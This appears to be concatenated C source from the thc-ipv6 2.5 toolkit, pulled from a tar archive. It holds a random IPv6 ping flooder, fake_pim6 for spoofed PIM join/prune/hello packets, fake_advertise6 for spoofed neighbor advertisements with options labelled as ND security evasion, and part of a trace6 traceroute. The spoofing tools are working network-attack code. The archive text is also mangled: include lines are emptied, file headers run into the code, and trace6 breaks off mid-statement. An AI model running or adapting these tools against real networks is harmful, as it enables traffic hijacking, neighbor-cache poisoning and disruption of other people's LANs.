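  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];
  if ((srcmac = thc_get_own_mac(interface)) == NULL) {
    printf("Error: invalid interface defined: %s\n", interface);
    exit(-1);
  }

  dstnet = argv[2];             // dstnet holds the destination network argument
  if (dstnet == NULL || (ptr = index(dstnet, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
    exit(-1);
  }
  *ptr++ = 0;
  size = atoi(ptr);             // prefix length

  /* numbytes indexes into the 16-byte address below; a prefix length
   * outside 0..128 would make the loop write outside that buffer. */
  if (size < 0 || size > 128) {
    fprintf(stderr, "Error: prefix length must be between 0 and 128: %d\n", size);
    exit(-1);
  }
// printf("Prefix length is %d\n", size);
  if (size != 64)
    fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);

  numbytes = (128 - size) / 8;  // number of bytes to create
// printf("Creating %d random adress bytes\n", numbytes);

  srand(time(NULL) + getpid()); // initialize random number generator

  dst6 = thc_resolve6(dstnet);
  /* dst6 is written to directly in the loop, so it must not be NULL. */
  if (dst6 == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", dstnet);
    exit(-1);
  }
// thc_dump_data(dst6, 16, "dst");

  if (argc >= 4)
    src6 = thc_resolve6(argv[3]);
  else
    src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if (src6 == NULL) {
    fprintf(stderr, "Error: could not determine a source IPv6 address\n");
    exit(-1);
  }
// thc_dump_data(src6, 16, "src");

  dstmac = thc_get_mac(interface, src6, dst6);

  printf("Starting to randomly ping addresses in network %s/%d on %s:\n", dstnet, size, interface);
  while (1) {
    ++count;
    for (i = 0; i < numbytes; i++) {
      dst6[16 - numbytes + i] = rand() % 256;   // direct destination manipulation
    }

    /* On the first packet, compare the MAC resolved for the randomised
     * address with the one resolved for the network address; when they
     * match, dstmac is reused for every later packet. */
    if (count == 1) {
      tmpmac = thc_get_mac(interface, src6, dst6);
      if (tmpmac != NULL && dstmac != NULL && memcmp(dstmac, tmpmac, 6) == 0)
        samenet = 1;
    } else {
      if (samenet == 0) {
        free(dstmac);
        dstmac = thc_get_mac(interface, src6, dst6);
      }
    }
// printf("%s\n", ip6adr);
// printf("Sending ICMP ECHO to %s\n", ip6adr);

    if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
      errx(EXIT_FAILURE, "THC: Could not create IPv6 packet\n");
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, buf, sizeof(buf), 0) == -1)
      errx(EXIT_FAILURE, "THC: Could not add ICMP6 packet contents\n");
    //thc_add_udp(pkt, &pkt_len, 53, 53, 0, buf, sizeof(buf));

    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      printf("!");

    thc_destroy_packet(pkt);
    usleep(1);
    if (count % 1000 == 0)
      printf(".");
  }
}
thc-ipv6-2.5/fake_pim6.c0000644000000000000000000000757512251022436013536 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

void help(char *prg) {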
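/* Body of fake_pim6.c help(): prints the usage text and ends with exit(-1).
 * Its signature is on the preceding line. */
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax:\n");
  printf(" %s [-t ttl] [-s src6] [-d dst6] interface hello [dr_priority]\n", prg);
  printf(" %s [-t ttl] [-s src6] [-d dst6] interface join|prune neighbor6 multicast6 target6\n\n", prg);
  printf("The hello command takes optionally the DR priority (default: 0).\n");
  printf("The join and prune commands need the multicast group to modify, the target\naddress that joins or leavs and the neighbor PIM router\n");
  printf("Use -s to spoof the source ip6, -d to send to another address than ff02::d,\nand -t to set a different TTL (default: 1)\n");
  exit(-1);
}

/*
 * fake_pim6 entry point.
 *
 * Parses -t/-s/-d, then `interface hello [dr_priority]` or
 * `interface join|prune neighbor6 multicast6 target6`, fills buf with the
 * message body for the chosen mode, and sends one PIM packet (retrying
 * thc_send_pkt() until it succeeds).
 *
 * Returns 0 after sending and -1 when a packet-building helper fails;
 * argument errors terminate through help() or exit(-1).
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, buf[100];
  unsigned char *dst6 = NULL, *src6 = NULL, *multicast6, *target6, *neighbor6;
  int pkt1_len = 0, i = 0;
  char *interface;
  /* mode keeps the user's choice (0 hello, 1 join, 2 prune); pim_type is
   * the value handed to thc_add_pim() (0 for hello, 3 for join/prune). */
  int ttl = 1, mode = -1, pim_type = 0, len = 0;
  unsigned int dr_priority;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "t:s:d:")) >= 0) {
    switch (i) {
    case 't':
      ttl = atoi(optarg);
      break;
    case 's':
      /* An unresolvable address is rejected instead of silently leaving
       * src6 NULL. */
      if ((src6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: invalid IPv6 source address specified: %s\n", optarg);
        exit(-1);
      }
      break;
    case 'd':
      if ((dst6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: invalid IPv6 destination address specified: %s\n", optarg);
        exit(-1);
      }
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  /* argv[optind] and argv[optind + 1] are read below; once options have
   * been consumed the initial argc test no longer guarantees they exist. */
  if (argc - optind < 2)
    help(argv[0]);

  interface = argv[optind];
  /* Only the first three characters of the mode keyword are compared. */
  if (strncasecmp(argv[optind + 1], "hello", 3) == 0)
    mode = 0;
  if (strncasecmp(argv[optind + 1], "join", 3) == 0)
    mode = 1;
  if (strncasecmp(argv[optind + 1], "prune", 3) == 0) {
    mode = 2;
  }
  if (mode == -1) {
    fprintf(stderr, "Error: no mode defined, specify hello, join or prune\n");
    exit(-1);
  }

  if (mode != 0) {
    if (argc - optind != 5) {
      fprintf(stderr, "Error: join/prune mode need a multicast and target address\n");
      exit(-1);
    }
    neighbor6 = thc_resolve6(argv[optind + 2]);
    multicast6 = thc_resolve6(argv[optind + 3]);
    target6 = thc_resolve6(argv[optind + 4]);
    if (multicast6 == NULL || target6 == NULL || neighbor6 == NULL) {
      fprintf(stderr, "Error: unable to resolve addresses\n");
      exit(-1);
    }
  }

  if (dst6 == NULL)
    dst6 = thc_resolve6("ff02::d");

  if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL)
    return -1;

  memset(buf, 0, sizeof(buf));
  // here we set buf and len
  switch (mode) {
  case 0:
    buf[1] = 1;
    buf[3] = 2;
    buf[5] = 255;
    buf[7] = 19;
    buf[9] = 4;
    if (argc - optind >= 3) {
      /* Store the priority as four big-endian bytes. The original wrote
       * the top byte as `i / 256*256*256`, which parses as
       * ((i / 256) * 256) * 256 and always truncates to 0. */
      dr_priority = (unsigned int) atoi(argv[optind + 2]);
      buf[10] = (dr_priority >> 24) & 0xff;
      buf[11] = (dr_priority >> 16) & 0xff;
      buf[12] = (dr_priority >> 8) & 0xff;
      buf[13] = dr_priority & 0xff;
    }
    len = 14;
    break;
  default:
    buf[0] = 2;
    memcpy(buf + 2, neighbor6, 16);
    buf[19] = 1;
    buf[21] = 255;
    buf[22] = 2;
    buf[25] = 128;
    memcpy(buf + 26, multicast6, 16);
    if (mode == 1)
      buf[43] = 1;
    else
      buf[45] = 1;
    buf[46] = 2;
    buf[48] = 7;
    buf[49] = 128;
    memcpy(buf + 50, target6, 16);
    len = 66;
    /* The original overwrote mode with 3 here, which made the status line
     * below print "prune" for a join as well. */
    pim_type = 3;
  }

  if (thc_add_pim(pkt1, &pkt1_len, pim_type, buf, len) < 0)
    return -1;

  if (thc_generate_pkt(interface, NULL, NULL, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  while (thc_send_pkt(interface, pkt1, &pkt1_len) < 0)
    usleep(5);

  printf("Sent PIM %s message\n", mode == 0 ? "hello" : mode == 1 ? "join" : "prune");

  return 0;
}
thc-ipv6-2.5/fake_advertise6.c0000644000000000000000000001430612251022435014724 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/*
 * Print the usage text for fake_advertise6 and terminate the process.
 *
 * prg is the program name shown in the banner and syntax line.
 * Never returns: the function ends with exit(-1).
 */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-DHF] [-Ors] [-n count] [-w seconds] interface ip-address-advertised [target-address [mac-address-advertised [source-ip-address]]]\n\n", prg);
  printf("Advertise IPv6 address on the network (with own mac if not specified),\n");
  printf("sending it to the all-nodes multicast address if no target address is set.\n");
  printf("Source ip address is the address advertised if not set.\n\n");
  printf("Sending options:\n");
  printf(" -n count send how many packets (default: forever)\n");
  printf(" -w seconds wait time between the packets sent (default: 5)\n");
  printf("Flag options:\n");
  printf(" -O do NOT set the override flag (default: on)\n");
  printf(" -r DO set the router flag (default: off)\n");
  printf(" -s DO set the solicitate flag (default: off)\n");
  printf("ND Security evasion options (can be combined):\n");
  printf(" -H add a hop-by-hop header\n");
  printf(" -F add a one shot fragment header (can be specified multiple times)\n");
  printf(" -D add a large destination header which fragments the packet.\n");
  exit(-1);
}

/*
 * fake_advertise6 entry point.
 *
 * Parses the options and the positional arguments
 *   interface ip-address-advertised [target [mac [source-ip]]]
 * builds two neighbor-advertisement packets (pkt1 with the selected flags,
 * pkt2 with flags 0) and sends both every `wait` seconds, `loop` times or
 * forever when -n is not given.
 *
 * Returns 0 when the loop ends and -1 when a packet-building helper fails;
 * argument errors terminate through help() or exit(-1).
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, *pkt2 = NULL, buf[24], buf2[6], buf3[1500];
  unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac;
  /* cnt seeds the fragment identifiers; it was read uninitialised before. */
  int pkt1_len = 0, pkt2_len = 0, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt = 0, type = NXT_ICMP6, wait = 5, loop = -1;
  unsigned int flags = ICMP6_NEIGHBORADV_OVERRIDE;
  unsigned int macpart[6];
  char *interface;
  int offset = 14;
  thc_ipv6_hdr *hdr;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "DFHOrsn:w:")) >= 0) {
    switch (i) {
    case 'n':
      loop = atoi(optarg);
      break;
    case 'w':
      wait = atoi(optarg);
      break;
    case 'O':
      if ((flags & ICMP6_NEIGHBORADV_OVERRIDE) > 0)
        flags -= ICMP6_NEIGHBORADV_OVERRIDE;
      break;
    case 'r':
      flags = (flags | ICMP6_NEIGHBORADV_ROUTER);
      break;
    case 's':
      flags = (flags | ICMP6_NEIGHBORADV_SOLICIT);
      break;
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 2)
    help(argv[0]);

  /* do_hdr_size is not defined in this file (presumably thc-ipv6.h). */
  if (do_hdr_size)
    offset = do_hdr_size;

  interface = argv[optind];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
    exit(-1);
  }

  if (argc - optind >= 3 && argv[optind + 2] != NULL)
    dst6 = thc_resolve6(argv[optind + 2]);
  else
    dst6 = thc_resolve6("ff02::1");
  if (dst6 == NULL) {
    fprintf(stderr, "Error: could not resolve destination of advertise: %s\n", argv[optind + 2]);
    exit(-1);
  }

  if (argc - optind >= 4 && argv[optind + 3] != NULL) {
    /* Parse into unsigned ints and copy byte by byte. The original stored
     * each %x through an (unsigned int *) cast of a char slot and ignored
     * the sscanf() result, so a malformed address went unnoticed. */
    if (sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", &macpart[0], &macpart[1], &macpart[2], &macpart[3], &macpart[4], &macpart[5]) != 6) {
      fprintf(stderr, "Error: invalid mac address %s\n", argv[optind + 3]);
      exit(-1);
    }
    for (i = 0; i < 6; i++) {
      if (macpart[i] > 255) {
        fprintf(stderr, "Error: invalid mac address %s\n", argv[optind + 3]);
        exit(-1);
      }
      srcmac[i] = (unsigned char) macpart[i];
    }
  } else
    mac = thc_get_own_mac(interface);

  if (argc - optind >= 5 && argv[optind + 4] != NULL) {
    if ((src6 = thc_resolve6(argv[optind + 4])) == NULL) {
      fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 4]);
      exit(-1);
    }
  } else
    src6 = unicast6;

  /* 24-byte advertisement body: the advertised address, two fixed bytes,
   * then the 6-byte MAC. */
  memset(buf, 0, sizeof(buf));
  memcpy(buf, unicast6, 16);
  buf[16] = 2;
  buf[17] = 1;
  memcpy(&buf[18], mac, 6);

  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0)
      return -1;
  }
  if (do_frag) {
    if (type == NXT_ICMP6)
      type = NXT_FRAG;
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0)
        return -1;
  }
  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_NEIGHBORADV, 0, flags, (unsigned char *) &buf, 24, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  if ((pkt2 = thc_create_ipv6_extended(interface, prefer, &pkt2_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (do_hop)
    if (thc_add_hdr_hopbyhop(pkt2, &pkt2_len, buf2, sizeof(buf2)) < 0)
      return -1;
  if (do_frag)
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt2, &pkt2_len, cnt++) < 0)
        return -1;
  /* NOTE(review): pkt1 adds this header with thc_add_hdr_dst(); confirm
   * that the different call here is intended. */
  if (do_dst)
    if (thc_add_hdr_hopbyhop(pkt2, &pkt2_len, buf3, sizeof(buf3)) < 0)
      return -1;
  if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_NEIGHBORADV, 0, 0, (unsigned char *) &buf, 24, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac, NULL, pkt2, &pkt2_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  printf("Starting advertisement of %s (Press Control-C to end)\n", argv[optind + 1]);
  /* loop == -1 (the default) is never decremented, so it runs until the
   * process is interrupted. */
  while (loop) {
    if (do_dst) {
      hdr = (thc_ipv6_hdr *) pkt1;
      thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
      hdr = (thc_ipv6_hdr *) pkt2;
      thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
    } else {
      thc_send_pkt(interface, pkt1, &pkt1_len);
      thc_send_pkt(interface, pkt2, &pkt2_len);
    }
    if (loop != -1)
      loop--;
    if (loop)
      sleep(wait);
  }
  return 0;
}
thc-ipv6-2.5/trace6.c0000644000000000000000000004531412251022441013046 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_SEND 15 #define 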
INCREASE 8 #define SENDS 3 #define POS_SIZE ((SENDS * MAX_SEND) + 2) unsigned char *position[POS_SIZE]; unsigned char *remark[POS_SIZE]; unsigned int rmtu[POS_SIZE]; unsigned char buf2[4]; unsigned short int baseport = 1200; unsigned int pid = 0; unsigned int mtu = 0; unsigned int orig_mtu = 0; int udp = 0, offset = 48, buf_len = 16, tunnel = 0, do_alert = 0, do_reply = 0, do_toobig = 0, do_frag = 0, do_dst = 0, do_dst2 = 0; int up_to = MAX_SEND, complete = 0, type = 0, rawmode = 0, finaldst = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-abdtu] [-s src6] interface targetaddress [port]\n\n", prg); printf("Options:\n"); printf(" -a insert a hop-by-hop header with router alert option.\n"); printf(" -D insert a destination extension header\n"); printf(" -E insert a destination extension header with an invalid option\n"); printf(" -F insert a one-shot fragmentation header\n"); printf(" -b instead of an ICMP6 Ping, use TooBig (you will not see the target)\n"); printf(" -B instead of an ICMP6 Ping, use PingReply (you will not see the target)\n"); printf(" -d resolves the IPv6 addresses to DNS.\n"); printf(" -t enables tunnel detection\n"); printf(" -u use UDP instead of TCP if a port is supplied\n"); printf(" -s src6 specifies the source IPv6 address\n"); printf("Maximum hop reach: %d\n\n", INCREASE * (SENDS - 1) + MAX_SEND); printf("A basic but very fast traceroute6 program.\n"); printf("If no port is specified, ICMP6 Ping requests are used, otherwise TCP SYN\n"); printf("packets to the specified port. 
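/* Returns 1 when the n bytes starting at offset off lie inside a capture of len bytes. */
static int trace6_in_bounds(int len, int off, int n) {
  return len >= 0 && off >= 0 && n >= 0 && n <= len && off <= len - n;
}

/* Returns 1 when hop is a usable index into position[]/remark[] and hop + 1 is
 * still inside those arrays (several callers also write position[hop + 1]). */
static int trace6_slot_ok(int hop) {
  return hop >= 0 && hop <= up_to && hop + 1 < POS_SIZE;
}

/* Decodes a big-endian 16 bit value without relying on pointer alignment. */
static unsigned int trace6_be16(const unsigned char *p) {
  return ((unsigned int) p[0] << 8) | p[1];
}

/* Decodes a big-endian 32 bit value without relying on pointer alignment. */
static unsigned int trace6_be32(const unsigned char *p) {
  return ((unsigned int) p[0] << 24) | ((unsigned int) p[1] << 16) | ((unsigned int) p[2] << 8) | p[3];
}

/*
 * Extracts the hop index that a probe carried in two adjacent, identical bytes
 * of the packet quoted inside an ICMPv6 error. The offsets are the ones the
 * original code used; they depend on how many extension headers the probe had
 * (add / add2) and on the probe type. Returns the hop index, or -1 when the
 * bytes are outside the capture, differ, or do not name a valid slot.
 */
static int trace6_embedded_hop(const unsigned char *ptr, int len, int add, int add2) {
  int off;

  if (type != 2) {
    off = 93 + 8 * add;
    if (trace6_in_bounds(len, off, 2) && ptr[off] == ptr[off + 1] && trace6_slot_ok(ptr[off + 1]))
      return ptr[off + 1];
    /* fall back to the layout without fragment headers */
    off = 93 + 8 * add2;
  } else {
    off = 100 + 0x30 + 8 * (add + do_toobig - 1);
  }
  if (trace6_in_bounds(len, off, 2) && ptr[off] == ptr[off + 1] && trace6_slot_ok(ptr[off + 1]))
    return ptr[off + 1];
  return -1;
}

/*
 * pcap callback: matches one captured packet against the probes this process
 * sent and records the answering address in position[], a remark in remark[]
 * and, in tunnel mode, a reported MTU in rmtu[].
 *
 * foo    - user pointer supplied to the capture loop, unused here
 * header - pcap capture header; only caplen is read
 * data   - captured bytes
 *
 * Everything read from data is attacker-influenced network input. Every
 * offset is therefore checked against the captured length before it is read,
 * and every hop index taken from the packet is range-checked before it is used
 * as an array index (the earlier version indexed position[] with an unchecked
 * byte and could write rmtu[-1] for a hop value of 0).
 */
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  int i, ok = 0, len = header->caplen, add, add2, hop, off;
  unsigned char *ptr = (unsigned char *) data;
  unsigned int new_mtu = 0;

  (void) foo;
  if (!rawmode) {
    ptr += 14;
    len -= 14;
  }
  if (do_hdr_size) {
    ptr += (do_hdr_size - 14);
    len -= (do_hdr_size - 14);
    if (len < 1 || (ptr[0] & 240) != 0x60)
      return;
  }
  add = do_alert + do_frag + do_dst;
  add2 = do_alert + do_dst;
  if (debug && len > 0)
    thc_dump_data(ptr, len, "Received Packet");
  complete = 0;

  /* a full fixed IPv6 header is needed for ptr[6] and the source address at ptr + 8 */
  if (len < 40)
    return;

  if (tunnel && ptr[6] == NXT_ICMP6 && len >= 100 && ptr[40] == ICMP6_TOOBIG) {
    new_mtu = trace6_be32(ptr + 44);
    if (new_mtu < mtu) {
      hop = trace6_embedded_hop(ptr, len, add, add2);
      if (hop >= 1) {           /* hop 0 would index rmtu[-1] */
        rmtu[hop - 1] = new_mtu;
        mtu = new_mtu;
        buf_len = mtu - offset;
      }
    }
  }

  if (type != 1) {
    if (ptr[6] != NXT_ICMP6)
      return;
    if (len < 42)               /* ICMPv6 type and code must be present */
      return;
    if (ptr[40] == ICMP6_PINGREPLY) {
      if (len < 52 || memcmp(ptr + 48, buf2, 4) != 0)   // from a different process?
        return;
      hop = ptr[46];
      if (trace6_slot_ok(hop) && position[hop] != NULL && hop == ptr[45]) {
        position[hop] = thc_ipv62notation(ptr + 8);
        remark[hop] = strdup("\t[ping reply received]");
        position[hop + 1] = NULL;
        finaldst = 1;
      }
    } else {
      // now for the error icmp types
      if (type == 0)
        off = 96 + 8 * (add);
      else
        off = 104 + 0x30 + 8 * (add);
      if (!trace6_in_bounds(len, off, 4) || memcmp(ptr + off, buf2, 4) != 0)    // from a different process?
        return;
      if (ptr[40] == ICMP6_TTLEXEED && ptr[41] == 0 && len >= 100) {
        hop = trace6_embedded_hop(ptr, len, add, add2);
        if (hop >= 0)
          position[hop] = thc_ipv62notation(ptr + 8);
      }
      if (ptr[40] == ICMP6_UNREACH) {
        hop = trace6_embedded_hop(ptr, len, add, add2);
        if (hop >= 0) {
          if (position[hop] != NULL) {
            position[hop] = thc_ipv62notation(ptr + 8);
            remark[hop] = strdup("\t[unreachable message received]");
          }
          position[hop + 1] = NULL;
        }
      }
      if (do_dst2 == 1 && ptr[40] == ICMP6_PARAMPROB) {
        hop = trace6_embedded_hop(ptr, len, add, add2);
        if (hop >= 0) {
          if (position[hop] != NULL) {
            position[hop] = thc_ipv62notation(ptr + 8);
            remark[hop] = strdup("\t[parameter problem received]");
          }
          position[hop + 1] = NULL;
          finaldst = 1;
        }
      }
    }
  } else {
    if (ptr[6] != NXT_ICMP6 && ((udp == 0 && ptr[6] != NXT_TCP) || (udp == 1 && ptr[6] != NXT_UDP)))
      return;
    if (ptr[6] == NXT_TCP) {
      if (len < 54)             /* ports, the 32 bit field at 48 and the flag byte at 53 */
        return;
      /* the probe's source port encodes the hop; a difference outside the
       * valid slot range is rejected instead of being truncated to a byte */
      hop = (int) trace6_be16(ptr + 42) - (int) baseport;
      if ((pid + 1) != trace6_be32(ptr + 48))
        return;
      if (trace6_slot_ok(hop) && position[hop] != NULL) {
        position[hop] = thc_ipv62notation(ptr + 8);
        switch (ptr[53] & 6) {
        case 2:
          remark[hop] = strdup("\t[TCP SYN-ACK reply received]");
          break;
        case 4:
          remark[hop] = strdup("\t[TCP RST reply received]");
          break;
        default:
          remark[hop] = strdup("\t[TCP unknown reply received]");
        }
        position[hop + 1] = NULL;
        finaldst = 1;
      }
    }
    if (ptr[6] == NXT_UDP) {
      if (len < 44)
        return;
      hop = (int) trace6_be16(ptr + 42) - (int) baseport;
      if (trace6_slot_ok(hop) && position[hop] != NULL) {
        position[hop] = thc_ipv62notation(ptr + 8);
        remark[hop] = strdup("\t[UDP reply received]");
        position[hop + 1] = NULL;
        finaldst = 1;
      }
    }
    if (ptr[6] == NXT_ICMP6 && len >= 100 && ptr[40] == ICMP6_TTLEXEED && ptr[41] == 0) {
      off = 88 + 8 * (add);
      if (!trace6_in_bounds(len, off, 8))
        return;
      hop = (int) trace6_be16(ptr + off) - (int) baseport;
      if (pid != trace6_be32(ptr + off + 4))
        return;
      if (trace6_slot_ok(hop))
        position[hop] = thc_ipv62notation(ptr + 8);
    }
    if (ptr[6] == NXT_ICMP6 && len >= 100 && ptr[40] == ICMP6_UNREACH) {
      off = 88 + 8 * (add);
      if (!trace6_in_bounds(len, off, 8))
        return;
      hop = (int) trace6_be16(ptr + off) - (int) baseport;
      if (pid != trace6_be32(ptr + off + 4))
        return;
      if (trace6_slot_ok(hop) && position[hop] != NULL) {
        position[hop] = thc_ipv62notation(ptr + 8);
        if (udp && ptr[41] == 4) {
          remark[hop] = strdup("\t[port unreachable message received]");
          position[hop + 1] = NULL;
          finaldst = 1;
        } else
          remark[hop] = strdup("\t[unreachable message received]");
      }
    }
  }

  /* the trace is complete once every slot up to the terminating NULL is answered */
  for (i = 1; i <= up_to && position[i] != NULL; i++) {
    if (position[i][0] != '?')
      ok++;
    if (position[ok + 1] == NULL)
      complete = 1;
  }
}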
NULL, string[64] = "ip6 and dst "; int pkt_len = 0, pkt2_len = 0, prefer = PREFER_GLOBAL, i, k, m, dport = 0, resolve = 0, notreached = 0; unsigned int j; struct hostent *he; unsigned char *interface, *srcmac, buf[2560], dummy[4] = "???", text[120], buf3[6]; time_t passed; pcap_t *p; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "abBdtrus:FDEX")) >= 0) { switch (i) { case 'd': resolve = 1; break; case 'X': debug = 1; break; case 'a': do_alert = 1; break; case 'b': do_toobig++; type = 2; break; case 'B': do_reply++; type = 2; break; case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 't': tunnel = 1; break; case 'u': udp = 1; break; case 's': src6 = thc_resolve6(optarg); break; case 'F': do_frag++; break; case 'E': do_dst++; do_dst2 = 1; break; case 'D': do_dst++; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); interface = argv[optind]; if ((dst6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[optind + 1]); exit(-1); } if (src6 == NULL) src6 = thc_get_own_ipv6(interface, dst6, prefer); srcmac = thc_get_own_mac(interface); up_to = MAX_SEND; if (do_reply) do_toobig = 0; if (argc - optind >= 3 && argv[optind + 2] != NULL) { if (type) { fprintf(stderr, "Error: you can not use option -b and specify a target TCP port together\n"); exit(-1); } type = 1; dport = atoi(argv[optind + 2]); if (dport < 0 || dport > 65535) { fprintf(stderr, "Error: port (3rd option) is invalid: %s\n", argv[optind + 2]); exit(-1); } } if (src6 == NULL || srcmac == NULL) { fprintf(stderr, "Error: interface not valid: %s!\n", interface); exit(-1); } if (rawmode == 0 && (mac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[optind + 1]); exit(-1); } strcat(string, 
thc_ipv62notation(src6)); for (i = 0; i < POS_SIZE; i++) { position[i] = dummy; remark[i] = strdup(""); rmtu[i] = 0; } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (tunnel) { if (type == 1) offset += 12; if (do_hdr_size) offset += do_hdr_size; if ((mtu = thc_get_mtu(interface)) > sizeof(buf) + offset) buf_len = sizeof(buf) + offset; else buf_len = mtu - offset; if (do_alert) buf_len -= 8; orig_mtu = buf_len + offset; } if (do_alert) { memset(buf3, 0, sizeof(buf3)); buf3[0] = 5; buf3[1] = 2; } while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); if (type == 1) { baseport += getpid() % 60000; pid = (getpid() << 16) + getpid(); if (tunnel == 0) buf_len = 0; } else { buf2[0] = getpid() / 256; buf2[1] = getpid() % 256; buf2[2] = buf[0]; // unitialized, thats fine buf2[3] = buf[1]; // unitialized, thats fine for (m = 0; m < (sizeof(buf) / 4); m++) memcpy(buf + (m * 4), buf2, 4); } for (k = 0; k < SENDS; k++) { if (complete == 0) { for (i = 1; i <= up_to; i++) { if (position[i] != NULL && position[i][0] == '?') { if (type != 1) memset((char *) &j, i % 256, 4); if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, dst6, i, 0, 0, 0, 0)) == NULL) return -1; if (do_alert) if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf3, 6) < 0) return -1; if (type != 2) { if (do_frag) for (m = 0; m < do_frag; m++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + m) < 0) return -1; if (do_dst) { memset(buf3, 0, 6); if (do_dst2) { buf3[0] = NXT_INVALID; buf3[1] = 1; } for (m = 0; m < do_dst; m++) if (thc_add_hdr_dst(pkt, &pkt_len, buf3, 6) < 0) return -1; } } if (type == 0) { if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, j, (unsigned char *) &buf, buf_len, 0) < 0) return -1; } else { if (type == 2) { memset(foomac, 0xff, sizeof(foomac)); memcpy(foo6, src6, 16); m = 1500 - 40 - 8; if (foo6[8]) foo6[8] = 0; else 